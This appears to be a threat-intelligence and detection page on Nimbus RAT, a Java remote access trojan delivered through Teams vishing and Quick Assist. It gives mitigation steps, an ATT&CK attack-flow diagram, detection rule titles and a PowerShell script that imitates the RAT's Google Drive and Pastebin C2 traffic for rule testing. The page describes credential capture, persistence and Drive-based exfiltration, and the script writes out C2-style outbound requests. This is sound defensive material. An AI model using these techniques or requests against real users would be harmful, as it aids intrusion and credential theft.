Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors used Microsoft Teams voice phishing together with Quick Assist to deploy a Java-based remote access trojan known as Nimbus RAT. The malware relies on Google Drive and Google Sheets as its command-and-control channels and includes its own bundled OpenJDK runtime. For credential theft, it uses either a fake Windows security prompt or the native CredUI API to capture user secrets.
Investigation
eSentire’s Threat Response Unit reconstructed the complete intrusion chain using mail-flow logs, endpoint telemetry, and static analysis of the Java malware. The campaign combined email bombing, a Teams-based vishing call, Quick Assist remote support, a Pastebin-hosted instruction sheet, and a compromised SharePoint tenant used to distribute the payload.
Mitigation
Recommended defenses include disabling external Teams messaging from unknown tenants, blocking Quick Assist where it is not required, alerting on spikes in email bombing activity, monitoring javaw.exe execution from unusual locations, and detecting suspicious Google Drive API calls initiated by unexpected processes.
Response
If Nimbus RAT activity is detected, isolate the affected system, terminate all related javaw.exe processes, remove the C:\ProgramData\InboxCorePro directory and any associated startup shortcuts, and consider a full system reimage. Review Google Workspace audit logs as well to identify any unauthorized Google Drive application grants.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef data fill:#e6e6e6 %% Nodes u2013 Actions action_phishing["<b>Action</b> – <b>T1566.003 Phishing: Spearphishing via Service</b><br/>Email bombing delivers subscriptionu2011confirmation messages that set up a later Microsoft Teams vishing call"] class action_phishing action action_trusted_rel["<b>Action</b> – <b>T1199 Trusted Relationship</b><br/>Attacker creates throwaway Microsoft 365 tenant or compromises a legitimate tenant to send malicious external Teams messages that appear trusted"] class action_trusted_rel action action_user_exec_file["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim is instructed via Pastebin to download a ZIP from a compromised SharePoint site and run the JAR file using javaw.exe"] class action_user_exec_file action action_user_exec_copy["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Attacker copies the Pastebin URL into the Teams chat, tricking the user into visiting the site"] class action_user_exec_copy action action_persistence["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution</b><br/>Persistence is achieved by importing a .reg file and placing a shortcut in the Startup folder that launches the Java RAT"] class action_persistence action action_credential_harvest["<b>Action</b> – <b>T1056.002 Input Capture: GUI Input Capture</b><br/>Nimbus RAT displays a fake Java Swing credential dialog and the native Windows CredUI prompt to capture credentials"] class action_credential_harvest action action_c2["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>Command and control performed over Google Drive using serviceu2011account or OAuth2 authentication with encrypted polling files"] class action_c2 action action_exfil["<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service</b><br/>Collected data such as screenshots and files are uploaded to the same Google Drive folder used for C2"] class action_exfil action action_network_disc["<b>Action</b> – <b>T1016 System Network Configuration Discovery</b><br/>RAT executes commands like ipconfig /all to gather network interface details"] class action_network_disc action %% Nodes u2013 Tools / Malware / Files / Processes tool_email_bomb["<b>Tool</b> – Name: Email bombing script"] class tool_email_bomb tool tool_teams["<b>Tool</b> – Name: Microsoft Teams (vishing)"] class tool_teams tool tool_sharepoint["<b>Tool</b> – Name: Compromised SharePoint site"] class tool_sharepoint tool malware_nimbus["<b>Malware</b> – Name: Nimbus RAT (Java)"] class malware_nimbus malware file_jar["<b>File</b> – Name: InboxCorePro.jar (Java payload)"] class file_jar data process_javaw["<b>Process</b> – Name: javaw.exe (executes JAR)"] class process_javaw process file_reg["<b>File</b> – Name: Registry import .reg"] class file_reg data file_startup["<b>File</b> – Name: Shortcut in Startup folder"] class file_startup data service_gdrive["<b>Service</b> – Name: Google Drive (C2 and exfil)"] class service_gdrive data process_ipconfig["<b>Process</b> – Command: ipconfig /all"] class process_ipconfig process %% Connections u2013 Attack Flow action_phishing –>|uses| tool_email_bomb action_phishing –>|leads to| action_trusted_rel action_trusted_rel –>|uses| tool_teams action_trusted_rel –>|delivers| action_user_exec_copy action_user_exec_copy –>|provides link to| action_user_exec_file action_user_exec_file –>|downloads from| tool_sharepoint action_user_exec_file –>|executes| file_jar file_jar –>|run by| process_javaw process_javaw –>|launches| malware_nimbus malware_nimbus –>|creates| action_persistence action_persistence –>|imports| file_reg action_persistence –>|places| file_startup malware_nimbus –>|captures| action_credential_harvest malware_nimbus –>|communicates with| service_gdrive service_gdrive –>|supports| action_c2 service_gdrive –>|supports| action_exfil malware_nimbus –>|performs| action_network_disc action_network_disc –>|runs| process_ipconfig "
Attack Flow
Detections
Java App Execution from Suspicious Location (via process_creation)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible GoogleApis Domain Resolved By Known Abused Process (via dns_query)
View
Possible Google Command and Control Utility Activity (via proxy)
View
IOCs (HashSha256) to detect: Nimbus RAT: How Threat Actors Are Abusing Microsoft Teams and Google Drive to Deploy a Java RAT
View
Detection of Suspicious Use of Google APIs and Pastebin [Proxy]
View
Detection of Nimbus RAT Execution via javaw.exe and Reconnaissance Commands [Windows Process Creation]
View
Quick Assist and regedit.exe Execution in Vishing Attack [Microsoft Windows Security Event Log]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The threat actor has already compromised the endpoint with the Nimbus RAT binary. To establish a covert C2 channel, the RAT issues two outbound HTTP POST requests:- Google Drive API Call – uploads a small JSON payload to
https://www.googleapis.com/drive/v3/files?uploadType=media, mimicking the RAT’s “download‑payload” behavior. - Pastebin Paste – posts a base‑64‑encoded command string to
https://pastebin.com/api/api_post.phpusing the public API key.
Both requests are executed via PowerShell’s
Invoke-WebRequestto ensure the firewall logs contain thedomainfield (googleapis.comandpastebin.com). The attacker runs the commands under the context of the compromised user to blend with normal activity. - Google Drive API Call – uploads a small JSON payload to
-
Regression Test Script:
# -------------------------------------------------------------- # Nimbus RAT C2 Simulation – triggers Sigma rule on domain match # -------------------------------------------------------------- # 1. Google Drive API mock upload (no authentication – focuses on domain telemetry) $googlePayload = @{ name = "dummy.txt"; mimeType = "text/plain" } | ConvertTo-Json $googleUri = "https://www.googleapis.com/drive/v3/files?uploadType=media" try { Invoke-WebRequest -Uri $googleUri -Method POST -Body $googlePayload ` -ContentType "application/json" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Sent mock upload to Google Drive API" } catch { Write-Warning "Google Drive request failed (expected in sandbox): $_" } # 2. Pastebin public API post (requires a developer key – using a placeholder) $pastebinKey = "YOUR_PUBLIC_API_KEY" # <-- replace with a valid key for real test $pastebinText = "echo 'Simulated command from C2'" $pastebinUri = "https://pastebin.com/api/api_post.php" $pastebinBody = @{ api_dev_key = $pastebinKey api_option = "paste" api_paste_code = $pastebinText api_paste_private = "1" } try { Invoke-WebRequest -Uri $pastebinUri -Method POST -Body $pastebinBody ` -ContentType "application/x-www-form-urlencoded" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Posted mock command to Pastebin" } catch { Write-Warning "Pastebin request failed (expected in sandbox): $_" } # -------------------------------------------------------------- # End of simulation # -------------------------------------------------------------- -
Cleanup Commands:
# Remove any temporary files or variables used during the simulation Remove-Variable -Name googlePayload, googleUri, pastebinKey, pastebinText, pastebinUri, pastebinBody -ErrorAction SilentlyContinue Write-Host "[*] Cleanup complete."